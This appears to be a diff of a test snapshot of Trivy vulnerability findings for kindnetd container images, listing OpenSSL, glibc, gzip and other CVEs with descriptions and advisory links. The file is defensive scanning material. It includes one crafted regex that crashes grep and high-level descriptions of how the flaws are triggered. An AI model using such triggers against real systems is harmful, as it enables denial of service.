"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "https://linux.oracle.com/cve/CVE-2023-0286.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "X.400 address type confusion in X.509 GeneralName", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", + "value": "https://avd.aquasec.com/nvd/cve-2023-0286", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-1", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-2", + "value": "https://access.redhat.com/security/cve/CVE-2023-0286", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "value": "https://access.redhat.com/security/cve/cve-2023-0286", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5174", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", + "value": "https://bugzilla.redhat.com/2164440", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3219", - "installedVersion": "2.2.27-2+deb11u1", - "packageName": "gpgv", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-3219", - "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", - "https://dev.gnupg.org/D556", - "https://dev.gnupg.org/T5993", - "https://marc.info/?l=oss-security&m=165696590211434&w=4", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", - "https://security.netapp.com/advisory/ntap-20230324-0001/", - "https://www.cve.org/CVERecord?id=CVE-2022-3219", - ], - }, - "category": "Vulnerability", - "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "denial of service issue (resource consumption) using compressed packets", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3219", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3219", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://dev.gnupg.org/D556", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5993", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.10-4+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "1.10-4", - "packageName": "gzip", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", - ], - }, - "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "iptables", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "2.2.4", - "packageName": "libapt-pkg6.0", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.31-13+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://linux.oracle.com/cve/CVE-2023-0464.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", ], }, "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://linux.oracle.com/cve/CVE-2023-2650.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://ubuntu.com/security/notices/USN-6188-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", - ], - }, - "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", + "value": 